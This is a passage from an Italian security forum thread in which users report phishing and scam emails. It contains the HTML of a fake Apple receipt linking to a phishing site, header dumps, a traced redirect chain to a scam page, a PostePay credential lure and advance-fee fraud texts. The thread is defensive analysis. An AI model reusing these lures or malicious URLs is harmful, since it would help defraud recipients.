                                                    <DIV style="height: 1px; line-height: 1px; background-color: rgb(238, 238, 238);"></DIV>
                                                    <span style="font-size:12px;font-family:'Helvetica Neue',Helvetica,Arial,sans-serif;color:rgb(153,153,153)"> If you did not authorize this purchase, please go to:<br>
                            <a href="http://aplombstore.com/system/apple.direct.html" target="_blank"> Manage/<wbr>Cancel Applications</a>. </span></TD>
                                                </TR>
                                                <tr height="30">
                                                  <td colspan="5" style="padding:0 20px 0 0;color:rgb(153,153,153)" align="right"><span style="white-space:nowrap">Inclusive of VAT at <b>20%</b></span></td>
                                                </tr>
                                                <tr height="1">
                                                  <td colspan="5" style="padding:0 10px 0 10px" height="1">
                                                    <div style="line-height:1px;min-height:1px;background-color:rgb(238,238,238)"></div>
                                                  </td>
                                                </tr>
                                              </tbody>
                                            </table>
                                          </td>
                                        </tr>
                                        <tr>
                                          <td>
                                            <table style="border-collapse:collapse;border-spacing:0;width:660px;color:rgb(51,51,51);font-family:'Helvetica Neue',Helvetica,Arial,sans-serif" border="0" cellpadding="0" cellspacing="0" width="660">
                                              <tbody>
                                                <tr height="15">
                                                  <td colspan="3"></td>
                                                </tr>
                                                <tr>
                                                  <td colspan="3" style="padding:0 20px 0 0;white-space:nowrap" align="right"><span style="color:rgb(153,153,153);font-size:12px;white-space:nowrap">VAT charged at 20%</span>&nbsp;&nbsp;<span class="style1">$</span><span style="font-size:12px;font-weight:600;white-space:nowrap">2.66</span><br></td>
                                                </tr>
                                                <tr height="15">
                                                  <td colspan="3"></td>
                                                </tr>
                                                <tr height="1">
                                                  <td colspan="3" style="padding:0 10px 0 10px" height="1">
                                                    <div style="line-height:1px;min-height:1px;background-color:rgb(238,238,238)"></div>
                                                  </td>
                                                </tr>
                                                <tr height="48">
                                                  <td style="color:rgb(153,153,153);font-size:10px;font-weight:600;padding:0 30px 0 0;border-width:1px;border-color:rgb(238,238,238)" align="right">TOTAL</td>
                                                  <td style="background-color:rgb(238,238,238);width:1px" width="1"></td>
                                                  <td style="width:120px;padding:0 20px 0 0;font-size:16px;font-weight:600;white-space:nowrap" align="right" width="90"><span class="style1">$</span>15.98</td>
                                                </tr>
                                                <tr height="1">
                                                  <td colspan="3" style="padding:0 10px 0 10px" height="1">
                                                    <div style="line-height:1px;min-height:1px;background-color:rgb(238,238,238)"></div>
                                                  </td>
                                                </tr>
                                              </tbody>
                                            </table>
                                          </td>
                                        </tr>
                                      </tbody>
                                    </table>
                                  </td>
                                </tr>
                                <tr height="20">
                                  <td colspan="4"></td>
                                </tr>
                                <tr>
                                  <td></td>
                                  <td colspan="2" style="font-size:12px;font-family:'Helvetica Neue',Helvetica,Arial,sans-serif;color:rgb(153,153,153)" align="center"> Learn how to manage your password preferences for iTunes, iBooks and App Store purchases at <a href="https://support.apple.com/HT204030" target="_blank">https://support.apple.com/<wbr>HT204030</a>. To cancel your purchase within 14 days of receiving this invoice, <a href="https://buy.itunes.apple.com/WebObjects/MZFinance.woa/wa/reportAProblem?a=1029301683&cc=gb&d=10126111450&o=i&p=65006831935336&pli=65012989802591" target="_blank">report a problem</a> or <a href="http://www.apple.com/uk/support/itunes/contact/" target="_blank">contact us</a>.<br>
                                    <a href="http://www.apple.com/legal/internet-services/itunes/uk/rightofwithdrawal-uk.pdf" target="_blank">Learn more about your right of withdrawal</a></td>
                                  <td></td>
                                </tr>
                                <tr height="40">
                                  <td colspan="4"></td>
                                </tr>
                                <tr>
                                  <td></td>
                                  <td colspan="2" style="font-size:12px;font-family:'Helvetica Neue',Helvetica,Arial,sans-serif;color:rgb(153,153,153)" align="center"></td>
                                  <td></td>
                                </tr>
                                <tr height="8">
                                  <td colspan="4"></td>
                                </tr>
                                <TR class="ecxaapl-desktop-tbl">
                                  <TD></TD>
                                  <TD align="center" style='color: rgb(153, 153, 153); font-family: "Helvetica Neue",Helvetica,Arial,sans-serif; font-size: 12px;' colspan="2">
                                    <A style="color: rgb(0, 115, 255);" href="https://buy.itunes.apple.com/WebObjects/MZFinance.woa/wa/accountSummary" target="_blank">Apple ID Summary</A>&nbsp;&bull;&nbsp;
                                    <A style="color: rgb(0, 115, 255);" href="https://phobos.apple.com/WebObjects/MZFinance.woa/wa/purchaseHistory" target="_blank">Purchase History<A target="_blank">&nbsp;&bull;&nbsp;</a>
                                    </a>
                                    <A target="_blank"><A style="color: rgb(0, 115, 255);" href="https://xp.apple.com/report/2/its_mail_sf?emailType=invoice&lang=en_gb&eventType=linkClick&responseType=redirect&redirectUrl=http://www.apple.com/uk/support/itunes/legal/policies.html" target="_blank">Terms of Sale</A>&nbsp;&bull;&nbsp;
                                    <A style="color: rgb(0, 115, 255);" href="https://xp.apple.com/report/2/its_mail_sf?emailType=invoice&lang=en_gb&eventType=linkClick&responseType=redire
 ct&redirectUrl=https://www.apple.com/uk/privacy/" target="_blank">Privacy Policy</A>
                                    </a>
                                  </TD>
                                  <TD></TD>
                                </TR>
                                <tr height="25">
                                  <td colspan="4"></td>
                                </tr>
                                <TR class="ecxaapl-desktop-tbl">
                                  <TD></TD>
                                  <TD align="center" style='color: rgb(153, 153, 153); font-family: "Helvetica Neue",Helvetica,Arial,sans-serif; font-size: 12px;' colspan="2">
                                    <IMG width="18" height="21" style="padding: 0px; border: currentColor; -ms-interpolation-mode: bicubic;" alt="" src="http://r.mzstatic.com/email/images_shared/logo_apple_small_d-2x.png" border="0">
                                  </TD>
                                  <TD></TD>
                                </TR>
                                <TR class="ecxaapl-desktop-tbl">
                                  <TD class="ecxaapl-mobile-cell"></TD>
                                  <TD align="center" class="ecxaapl-mobile-cell" style='color: rgb(153, 153, 153); font-family: "Helvetica Neue",Helvetica,Arial,sans-serif; font-size: 12px;' colspan="2"> Copyright &copy; 2015 iTunes S.&agrave; r.l.
                                    <BR>
                                    <A style="color: rgb(0, 115, 255);" href="https://xp.apple.com/report/2/its_mail_sf?emailType=invoice&lang=en_gb&eventType=linkClick&responseType=redirect&redirectUrl=https://www.apple.com/uk/legal/" target="_blank">All rights reserved</A>
                                    <BR>
                                    <SPAN class="ecxlegal-entity"> 31-33, rue Sainte Zithe, L-2763 Luxembourg. Luxembourg VAT Reg No. LU20165772 </SPAN> </TD>
                                  <TD class="ecxaapl-mobile-cell"></TD>
                                </TR>
                                <TR height="25">
                                  <TD height="30" class="ecxaapl-mobile-cell" colspan="4"></TD>
                                </TR>
                              </TBODY>
                            </TABLE>
                          </DIV>
                        </TD>
                      </TR>
                    </TBODY>
                  </TABLE>
                  <IMG width="1" height="1" style="border: currentColor;" alt="" src="" border="0">
                  <BR>
Cliccando su "Manage/Cancel Applications" si visita l'URL:

Codice: Seleziona tutto

http://aplombstore.com/system/apple.direct.html
Si tratta di un sito probabilmente compromesso. Questa pagina, a sua volta, reindirizza al seguente URL (dopo 5 secondi):

Codice: Seleziona tutto

http://wiretechgadgets.com/store_export/appleID/user12-appleid/
Il sito era stato compromesso ed ospitava la classica pagina civetta di phishing (ad oggi la pagina è stata rimossa). Non ho salvato quest'ultima ma non era degna di nota... (credo fosse in inglese)

:ciao
“The quieter you become, the more you can hear”
Avatar utente
hashcat
Livello: Storage Area Network (12/15)
Livello: Storage Area Network (12/15)
Messaggi: 1946
Iscritto il: gio mag 02, 2013 4:13 pm

Re: Segnalazioni di mail di phishing o malware vario

Messaggio da hashcat »

Oggi ho trovato nella cartella dello spam della casella di posta di GMail associata a TurboLab.it un messaggio che finge di provenire proprio da questo sito (dal bugtracker, per essere precisi)! Non so come abbiano ricavato l'email in questione (utilizzavo un indirizzo speciale solo per il bugtracker) ma, nel campo To: della mail vi sono altri indirizzi a me sconosciuti...

Codice: Seleziona tutto

Delivered-To: ######@gmail.com
Received: by 10.12.164.165 with SMTP id ################;
        Sat, 29 Oct 2016 18:##:## -0700 (PDT)
X-Received: by 10.25.127.216 with SMTP id #################.##.#############;
        Sat, 29 Oct 2016 18:##:## -0700 (PDT)
Return-Path: <info@centriris.host>
Received: from centriris.host (mail.centriris.host. [95.213.252.139])
        by mx.google.com with ESMTPS id ################.##.####.##.##.##.##.##
        (version=TLS1_2 cipher=AES128-SHA bits=128/128);
        Sat, 29 Oct 2016 18:##:## -0700 (PDT)
Received-SPF: pass (google.com: domain of info@centriris.host designates 95.213.252.139 as permitted sender) client-ip=95.213.252.139;
Authentication-Results: mx.google.com;
       dkim=pass header.i=@centriris.host;
       spf=pass (google.com: domain of info@centriris.host designates 95.213.252.139 as permitted sender) smtp.mailfrom=info@centriris.host;
       dmarc=pass (p=NONE dis=NONE) header.from=centriris.host
DKIM-Signature: v=1; a=rsa-sha256; q=dns/txt; c=relaxed/relaxed; d=centriris.host; s=dkim; h=Content-Transfer-Encoding:Content-Type:Message-ID:MIME-Version:Subject:Date:To:From; bh=############################################; b=############################################################################################################################################################################;
Received: by centriris.host with esmtpsa (TLS1.2:DHE_RSA_AES_256_CBC_SHA256:256) (Exim 4.80) id ######-######-##; Sun, 30 Oct 2016 04:##:## +0300
From: "bug.TurboLab.it" <info@centriris.host>
To: Francesco Pinna <fran####cescopinna@gmail.com>, Google <nor####eply-b82a775c@plus.google.com>, hashcat <####@gmail.com>, GP Kart <inf####o@mail134-28.atl141.mandrillapp.com>, Nielsen survey <sur####vey@nielsen.com>
Date: Sun, 30 Oct 2016 04:##:## +0300
Subject: it's so unusual
MIME-Version: 1.0
Message-ID: <####@tiscali.it>
Content-Type: text/plain; charset="utf-8"
Content-Transfer-Encoding: quoted-printable

Hello,=20
I thought  you might like the stuff I found  by chance, it  seems so exciti=
ng and unusual, please take  a look here  <http://nnlis.pivotalimagery.com/=
#####/###>
Thx, bug.TurboLab.it
Ho visionato il link in questione registrando tutto il traffico generato dal client... per chi fosse interessato includo la traccia:

Codice: Seleziona tutto

* Connected to nnlis.pivotalimagery.com (166.62.28.105) port 80 (#0)
> GET /#####/### HTTP/1.1
> Host: nnlis.pivotalimagery.com
> User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0
> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
> Accept-Language: en-US,en;q=0.5
> Referer: https://mail.google.com/mail/
> Connection: keep-alive
> 
< HTTP/1.1 200 OK
< Date: Sun, 30 Oct 2016 ##:##:## GMT
< Server: Apache/2.4.23
< X-Powered-By: PHP/5.4.45
< Vary: Accept-Encoding,User-Agent
< Keep-Alive: timeout=5
< Connection: Keep-Alive
< Transfer-Encoding: chunked
< Content-Type: text/html
< 

<meta http-equiv="refresh" content="1; url=http://com-pid7617396.cc/?query_string=33&aff_name=KENHsa&clickID=##########&channel=footer&token=#######&timeID=########">

Codice: Seleziona tutto

Connected to com-pid7617396.cc (93.190.142.136) port 80 (#0)
> GET /?query_string=33&aff_name=KENHsa&clickID=##########&channel=footer&token=#######&timeID=######## HTTP/1.1
> Host: com-pid7617396.cc
> User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0
> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
> Accept-Language: en-US,en;q=0.5
> Referer: http://nnlis.pivotalimagery.com/#####/###
> Connection: keep-alive
> 
< HTTP/1.1 200 OK
< Server: nginx/1.2.1
< Date: Sun, 30 Oct 2016 ##:##:## GMT
< Content-Type: text/html; charset=UTF-8
< Content-Length: 293
< Connection: keep-alive
< Set-Cookie: PHPSESSID=##########################; path=/; domain=.com-pid7617396.cc
< Expires: Thu, 19 Nov 1981 ##:##:## GMT
< Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
< Pragma: no-cache
< Set-Cookie: #########=#################################; expires=Wed, 28-Oct-2026 ##:##:## GMT; Max-Age=315360000
< Vary: Accept-Encoding
< 

<script>location.href = "/tut.php?c=1&key=########################&id=########&gid=&pin=&pid=33&sid=http://com-pid7617396.cc&cid=##.##.##.##&tid=########&dal=http://com-pid7617396.cc/?query_string=33&aff_name=KENHsa&clickID=##########&channel=footer&token=#######&timeID=########";</script>

Codice: Seleziona tutto

* Connected to com-pid7617396.cc (93.190.142.136) port 80 (#0)
> GET /tut.php?c=1&key=########################&id=########&gid=&pin=&pid=33&sid=http://com-pid7617396.cc&cid=##.##.##.##&tid=########&dal=http://com-pid7617396.cc/?query_string=33&aff_name=KENHsa&clickID=##########&channel=footer&token=#######&timeID=######## HTTP/1.1
> Host: com-pid7617396.cc
> User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0
> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
> Accept-Language: en-US,en;q=0.5
> Referer: http://com-pid7617396.cc/?query_string=33&aff_name=KENHsa&clickID=##########&channel=footer&token=#######&timeID=########
> Connection: keep-alive
> 
< HTTP/1.1 302 Found
< Server: nginx/1.2.1
< Date: Sun, 30 Oct 2016 ##:##:## GMT
< Content-Type: text/html; charset=UTF-8
< Content-Length: 0
< Connection: keep-alive
< Set-Cookie: iMobiClick=##############################################################################################; expires=Mon, 31-Oct-2016 ##:##:## GMT; Max-Age=108000; path=/; domain=com-pid7617396.cc
< Location: /?bill=############&k=#####&mmzz=###########&lp=bas-it-zm15&offer=1&t=1&gnm=money24&ucc=33&add=IT-##########-########-##&uii=##########&ucccou=########&s=##########
< 

* Issue another request to this URL: 'http://com-pid7617396.cc/?bill=############&k=#####&mmzz=###########&lp=bas-it-zm15&offer=1&t=1&gnm=money24&ucc=33&add=IT-##########-########-##&uii=##########&ucccou=########&s=##########'
* Connected to com-pid7617396.cc (93.190.142.136) port 80 (#0)
> GET /?bill=############&k=#####&mmzz=###########&lp=bas-it-zm15&offer=1&t=1&gnm=money24&ucc=33&add=IT-##########-########-##&uii=##########&ucccou=########&s=########## HTTP/1.1
> Host: com-pid7617396.cc
> User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0
> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
> Accept-Language: en-US,en;q=0.5
> Referer: http://com-pid7617396.cc/tut.php?c=1&key=########################&id=########&gid=&pin=&pid=33&sid=http://com-pid7617396.cc&cid=##.##.##.##&tid=########&dal=http://com-pid7617396.cc/?query_string=33&aff_name=KENHsa&clickID=##########&channel=footer&token=#######&timeID=########
> Connection: keep-alive
> 
< HTTP/1.1 302 Found
< Server: nginx/1.2.1
< Date: Sun, 30 Oct 2016 ##:##:## GMT
< Content-Type: text/html; charset=UTF-8
< Content-Length: 0
< Connection: keep-alive
< Set-Cookie: PHPSESSID=##########################; path=/; domain=.com-pid7617396.cc
< Expires: Thu, 19 Nov 1981 ##:##:## GMT
< Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
< Pragma: no-cache
< location: http://money24.com-pid7617396.cc/?bill=############&k=#####&mmzz=###########&lp=bas-it-zm15&offer=1&t=1&gnm=money24&ucc=33&add=IT-##########-########-##&uii=##########&ucccou=########&s=##########
< 

* Issue another request to this URL: 'http://money24.com-pid7617396.cc/?bill=############&k=#####&mmzz=###########&lp=bas-it-zm15&offer=1&t=1&gnm=money24&ucc=33&add=IT-##########-########-##&uii=##########&ucccou=########&s=##########'
* Connected to money24.com-pid7617396.cc (93.190.142.136) port 80 (#1)
> GET /?bill=############&k=#####&mmzz=###########&lp=bas-it-zm15&offer=1&t=1&gnm=money24&ucc=33&add=IT-##########-########-##&uii=##########&ucccou=########&s=########## HTTP/1.1
> Host: money24.com-pid7617396.cc
> User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0
> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
> Accept-Language: en-US,en;q=0.5
> Referer: http://com-pid7617396.cc/?bill=############&k=#####&mmzz=###########&lp=bas-it-zm15&offer=1&t=1&gnm=money24&ucc=33&add=IT-##########-########-##&uii=##########&ucccou=########&s=##########
> Connection: keep-alive
> 
< HTTP/1.1 200 OK
< Server: nginx/1.2.1
< Date: Sun, 30 Oct 2016 ##:##:## GMT
< Content-Type: text/html; charset=UTF-8
< Transfer-Encoding: chunked
< Connection: keep-alive
< Set-Cookie: PHPSESSID=##########################; path=/; domain=.money24.com-pid7617396.cc
< Expires: Thu, 19 Nov 1981 ##:##:## GMT
< Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
< Pragma: no-cache
< Vary: Accept-Encoding
< 
Nel precedente campo "code" non è incluso il sorgente della pagina html: ciò non è stato possibile (a causa del limite sulla lunghezza del messaggio). Rimedio inserendo un link relativo solo al sorgente: pastebin.
Come si può facilmente evincere esplorandone il contenuto, si tratta di una pagina che pubblicizza un fantomatico "Metodo Italiano" per fare soldi (solito schema ricorrente di molte truffe).

:ciao
“The quieter you become, the more you can hear”
Avatar utente
hashcat
Livello: Storage Area Network (12/15)
Livello: Storage Area Network (12/15)
Messaggi: 1946
Iscritto il: gio mag 02, 2013 4:13 pm

Re: Segnalazioni di mail di phishing o malware vario

Messaggio da hashcat »

Ultimamente ho ricevuto un po' di spam relativo a PostePay (5 nuovi messaggi solo oggi):

Immagine

:mad:
“The quieter you become, the more you can hear”
Avatar utente
crazy.cat
Amministratore
Amministratore
Messaggi: 12448
Iscritto il: mer mag 01, 2013 4:02 pm
Località: Noventa Padovana
Contatta:

Re: Segnalazioni di mail di phishing o malware vario

Messaggio da crazy.cat »

L'altro giorno mi è arrivata una mail con link infetto, su un mio indirizzo raccogli spam di libero, e si è auto spedita alla maggior parte degli indirizzi che erano in posta inviata. Il tutto è solo sul web, mai usata localmente.
Uno degli indirizzi era mio di gmail e mi è arrivata anche su quello.
“Se tutti i documenti raccontavano la stessa favola, ecco che la menzogna diventava un fatto storico, quindi vera.”
Avatar utente
crazy.cat
Amministratore
Amministratore
Messaggi: 12448
Iscritto il: mer mag 01, 2013 4:02 pm
Località: Noventa Padovana
Contatta:

Re: Segnalazioni di mail di phishing o malware vario

Messaggio da crazy.cat »

La cosa strana è che il link breve ht+++tp://adf.ly/1gtAKT?r56t7yhu? che avevano nascosto sotto il link nella mail, mi rimanda al vero sito delle poste italiane. Hanno fatto una catena di mail di phishing con un link sbagliato.

A causa di un aggiornamento, abbiamo dovuto sospendere i pagamenti con la tua carta di credito
Gentile cliente,
A causa di un aggiornamento, abbiamo dovuto sospendere i pagamenti con la tua carta di credito. Prima che riabilitiamo l'uso della tua carta di credito abbiamo bisogno che ci confermi la tua identità compilando una serie di dati già inseriti nel nostro database al momento della tua registrazione sul portale PostePay.
Ti ricordiamo che non potrai più effettuare dei pagamenti con la tua carta di credito se questa verifica non viene eseguita entro 24 ore dalla sua ricezione.
Per eseguire subito la verifica dei dati, Clicca qui e seguire le istruzioni: https://poste.it/confermi/identita/securelogin/poste.it
Poste Italiane e costantemente impegnata a tutelare i dati dei clienti attraverso l'adozione dei piu moderni sistemi di sicurezza.
Si prega di non rispondere a questo messaggio. Mail inviata a questo indirizzo non puó essere risolta.
“Se tutti i documenti raccontavano la stessa favola, ecco che la menzogna diventava un fatto storico, quindi vera.”
Avatar utente
hashcat
Livello: Storage Area Network (12/15)
Livello: Storage Area Network (12/15)
Messaggi: 1946
Iscritto il: gio mag 02, 2013 4:13 pm

Re: Segnalazioni di mail di phishing o malware vario

Messaggio da hashcat »

Truffa alla nigeriana... (messaggio ricevuto ieri)

Mittente: "Mrs. Nora Igwe." <"www."@friend.ocn.ne.jp>
Oggetto: Re: Your Funds are Ready for pick-up Now...
X-Originating-IP: [41.79.219.218] (decisamente poco pulito: LINK1, LINK2)

Messaggio:

Attn: Dear,

We want to inform you that your $5000 has been release today from western union and we want you to contact Mr.David Mark immediately with this email address( western18union@outlook.com ) Or the phone number(+229 6821 8483) Here is the information the western union office need from you.

your full name____________
your country_____________
your phone numbers____________
your age_______________
Your occupation_______________

Ask him to give you the question and answer for you to pick up the $5000 he sent to you, he will be sending it $5000 until he finish sending the whole amount to you which is $1.5M USD, One Million Five Hundred Thousands Dollars, you will pay small amount for PIN CODE before you can pick up the money but we don't know the exactly amount.

We wish You Good luck
Mrs. Nora Igwe.
“The quieter you become, the more you can hear”
Avatar utente
crazy.cat
Amministratore
Amministratore
Messaggi: 12448
Iscritto il: mer mag 01, 2013 4:02 pm
Località: Noventa Padovana
Contatta:

Re: Segnalazioni di mail di phishing o malware vario

Messaggio da crazy.cat »

Credo di non avere mai visto un tentativo di phishing così elaborato, hanno richiesto tutti i dati della carta paypal, i dati per l'accesso alla banca, persino una copia di un documento personale, ma alla fine mi hanno ripristinato l'account paypal (che non ho mai avuto :D )

Immagine

Immagine

Immagine
“Se tutti i documenti raccontavano la stessa favola, ecco che la menzogna diventava un fatto storico, quindi vera.”
Avatar utente
The Doctor
Livello: Storage Area Network (12/15)
Livello: Storage Area Network (12/15)
Messaggi: 1947
Iscritto il: mer mag 01, 2013 3:46 pm
Località: Firenze
Contatta:

Re: Segnalazioni di mail di phishing o malware vario

Messaggio da The Doctor »

Grande! :lol: :lol: :lol:
Io sto con Wile Coyote e Gatto Silvestro...
Avatar utente
cippico
Livello: Storage Area Network (12/15)
Livello: Storage Area Network (12/15)
Messaggi: 1977
Iscritto il: gio mag 16, 2013 6:16 pm
Contatta:

Re: Segnalazioni di mail di phishing o malware vario

Messaggio da cippico »

:approvo

ciaooo a tutti
Salutone a Zane...padre putativo di...Turbolab... :-)
Mio sito... http://www.cippico.altervista.org
Avatar utente
hashcat
Livello: Storage Area Network (12/15)
Livello: Storage Area Network (12/15)
Messaggi: 1946
Iscritto il: gio mag 02, 2013 4:13 pm

Re: Segnalazioni di mail di phishing o malware vario

Messaggio da hashcat »

Nuova truffa alla nigeriana ricevuta un paio di settimane fa...

Intestazioni:

Codice: Seleziona tutto

Delivered-To: [REDACTED]@gmail.com
ARC-Authentication-Results: i=1; mx.google.com;
       spf=pass (google.com: domain of www.@abelia.ocn.ne.jp designates 153.149.233.4 as permitted sender) smtp.mailfrom=WWW.@abelia.ocn.ne.jp
Return-Path: <WWW.@abelia.ocn.ne.jp>
Received: from mbkd0203.ocn.ad.jp (mbkd0203.ocn.ad.jp. [153.149.233.4])
        by mx.google.com with ESMTP id XXXXXXXXXXXXXXX.XXX.2017.08.15.01.1X.XX;
        Tue, 15 Aug 2017 01:1X:XX -0700 (PDT)
Received-SPF: pass (google.com: domain of www.@abelia.ocn.ne.jp designates 153.149.233.4 as permitted sender) client-ip=153.149.233.4;
Authentication-Results: mx.google.com;
       spf=pass (google.com: domain of www.@abelia.ocn.ne.jp designates 153.149.233.4 as permitted sender) smtp.mailfrom=WWW.@abelia.ocn.ne.jp
Received: from mf-smf-ucb018.ocn.ad.jp (mf-smf-ucb018.ocn.ad.jp [153.149.227.67])
	by mbkd0203.ocn.ad.jp (Postfix) with ESMTP id XXXXXXXXXXX;
	Tue, 15 Aug 2017 17:1X:XX +0900 (JST)
Received: from mf-smf-ucb018.ocn.ad.jp (mf-smf-ucb018 [153.149.227.67])
	by mf-smf-ucb018.ocn.ad.jp (Postfix) with ESMTP id XXXXXXXXXX;
	Tue, 15 Aug 2017 17:1X:XX +0900 (JST)
Received: from ntt.pod01.mv-mta-ucb019 (mv-mta-ucb019.ocn.ad.jp [153.149.142.82])
	by mf-smf-ucb018.ocn.ad.jp (Switch-3.3.4/Switch-3.3.4) with ESMTP id XXXXXXXXXXXXXX;
	Tue, 15 Aug 2017 17:1X:XX +0900
Received: from vcwebmail.ocn.ad.jp ([153.149.227.165])
	by ntt.pod01.mv-mta-ucb019 with 
	id XXXXXXXXXXXXXXXXXXXXXX; Tue, 15 Aug 2017 08:1X:XX +0000
Received: from mzcstore192.ocn.ad.jp (mz-cb192p.ocn.ad.jp [180.8.110.137])
	by vcwebmail.ocn.ad.jp (Postfix) with ESMTP;
	Tue, 15 Aug 2017 17:1X:XX +0900 (JST)
Date: Tue, 15 Aug 2017 17:1X:XX +0900 (JST)
From: "Mr. Shegun Akintomi" <"WWW."@abelia.ocn.ne.jp>
Reply-To: "Mr. Shegun Akintomi" <mrsheguna@gmail.com>
<XXXXXXXXXX.XXXXXXXX.XXXXXXXXXXXXX.JavaMail.root@abelia.ocn.ne.jp>
Subject: Contact Mr. Shegun Akintomi (Skye bank ATM director)
MIME-Version: 1.0
Content-Type: text/plain; charset=ISO-2022-JP
Content-Transfer-Encoding: 7bit
X-Originating-IP: [197.234.219.32]
Corpo del messaggio:

Codice: Seleziona tutto



Attention please!!!

We were authorized by the President, Federal Republic of Benin and the Governing Board of Central Bank to investigate the unnecessary delay of your payment,to also recommend and approve your claims for payment if the report of the unclaimed contract/inheritance funds is genuine. However, we discovered that your funds has been unnecessarily delayed by corrupt officials of some banks.

We have agreed with the authority that we will handle this payment ourselves to avoid the hopeless situation created by those officials. Currently your Inheritance/Contract fund of $7.5Million has been credited in  ATM card.Contact Mr.Shegun Akintomi(Skye bank ATM director)with your details including phone lines for immediate delivery.

Contact Name: Mr. Shegun Akintomi
Email: mrsheguna@gmail.com
Tel: +22999679022
Signed,
management of Skye Bank Plc.

“The quieter you become, the more you can hear”
Avatar utente
hashcat
Livello: Storage Area Network (12/15)
Livello: Storage Area Network (12/15)
Messaggi: 1946
Iscritto il: gio mag 02, 2013 4:13 pm

Re: Segnalazioni di mail di phishing o malware vario

Messaggio da hashcat »

Altre quattro e-mail truffa dello stesso genere...

I:
Intestazioni:

Codice: Seleziona tutto

Received: by 10.157.63.129 with SMTP id XXXXXXXXXXXXXXX;
        Mon, 25 Sep 2017 21:3X:XX -0700 (PDT)
X-Received: by 10.99.126.23 with SMTP id XXXXXXXXXXXXXXX.XX.XXXXXXXXXXXXX;
        Mon, 25 Sep 2017 21:3X:XX -0700 (PDT)
ARC-Authentication-Results: i=1; mx.google.com;
       spf=pass (google.com: domain of ''www''@clear.ocn.ne.jp designates 153.149.230.3 as permitted sender) smtp.mailfrom=''www''@clear.ocn.ne.jp
Return-Path: <''www''@clear.ocn.ne.jp>
Received: from mbkd0102.ocn.ad.jp (mbkd0102.ocn.ad.jp. [153.149.230.3])
        by mx.google.com with ESMTP id XXXXXXXXXXXXXX.XXX.XXXX.XX.XX.XX.XX.XX;
        Mon, 25 Sep 2017 21:3X:XX -0700 (PDT)
Received-SPF: pass (google.com: domain of ''www''@clear.ocn.ne.jp designates 153.149.230.3 as permitted sender) client-ip=153.149.230.3;
Authentication-Results: mx.google.com;
       spf=pass (google.com: domain of ''www''@clear.ocn.ne.jp designates 153.149.230.3 as permitted sender) smtp.mailfrom=''www''@clear.ocn.ne.jp
Received: from mf-smf-ucb011.ocn.ad.jp (mf-smf-ucb011.ocn.ad.jp [153.149.228.228]) by mbkd0102.ocn.ad.jp (Postfix) with ESMTP id XXXXXXXXXXXX; Tue, 26 Sep 2017 13:3X:XX +0900 (JST)
Received: from mf-smf-ucb011.ocn.ad.jp (mf-smf-ucb011 [153.149.228.228]) by mf-smf-ucb011.ocn.ad.jp (Postfix) with ESMTP id XXXXXXXXXXX; Tue, 26 Sep 2017 13:3X:XX +0900 (JST)
Received: from msgw012-04.ocn.ad.jp (msgw012-04.ocn.ad.jp [180.37.203.219]) by mf-smf-ucb011.ocn.ad.jp (Switch-3.3.4/Switch-3.3.4) with ESMTP id XXXXXXXXXXXXXX; Tue, 26 Sep 2017 13:3X:XX +0900
Received: from User (p346086-ipngn200407kamokounan.kagoshima.ocn.ne.jp [180.24.145.86]) by msgw012-04.ocn.ad.jp (Postfix) with SMTP id XXXXXXXXXXX; Tue, 26 Sep 2017 13:3X:XX +0900 (JST)
Reply-To: <hensonpaul13@gmail.com>
From: "\"PAUL J.HENSON\"<" <''www''@clear.ocn.ne.jp>
Subject: INVESTMENT PROPOSAL..
Date: Mon, 25 Sep 2017 21:3X:XX -0700
MIME-Version: 1.0
Content-Type: text/plain; charset="Windows-1251"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Message-Id: <XXXXXXXXXXXXXX.XXXXXXXXXXX@msgw012-04.ocn.ad.jp>
To: undisclosed-recipients:;
Corpo del messaggio:

Codice: Seleziona tutto

Attention,

I represent an investor seeking` to invest  in any lucrative investment in your country, If you have a solid background and idea of making good profit in any  business, Please  write me for possible business co-operation.

Regards,

Paul James Henson.

II:
Intestazioni:

Codice: Seleziona tutto

Received: by 10.157.47.219 with SMTP id XXXXXXXXXXXXXXX;
        Sat, 21 Oct 2017 10:4X:XX -0700 (PDT)
X-Received: by 10.101.68.133 with SMTP id XXXXXXXXXXXXXX.XXX.XXXXXXXXXXXXX;
        Sat, 21 Oct 2017 10:4X:XX -0700 (PDT)
ARC-Authentication-Results: i=1; mx.google.com;
       spf=pass (google.com: domain of w.pete@tulip.ocn.ne.jp designates 153.149.236.27 as permitted sender) smtp.mailfrom=w.pete@tulip.ocn.ne.jp
Return-Path: <w.pete@tulip.ocn.ne.jp>
Received: from mbkd0326.ocn.ad.jp (mbkd0326.ocn.ad.jp. [153.149.236.27])
        by mx.google.com with ESMTP id XXXXXXXXXXXXXX.XXX.2017.10.21.10.4X.XX;
        Sat, 21 Oct 2017 10:4X:XX -0700 (PDT)
Received-SPF: pass (google.com: domain of w.pete@tulip.ocn.ne.jp designates 153.149.236.27 as permitted sender) client-ip=153.149.236.27;
Authentication-Results: mx.google.com;
       spf=pass (google.com: domain of w.pete@tulip.ocn.ne.jp designates 153.149.236.27 as permitted sender) smtp.mailfrom=w.pete@tulip.ocn.ne.jp
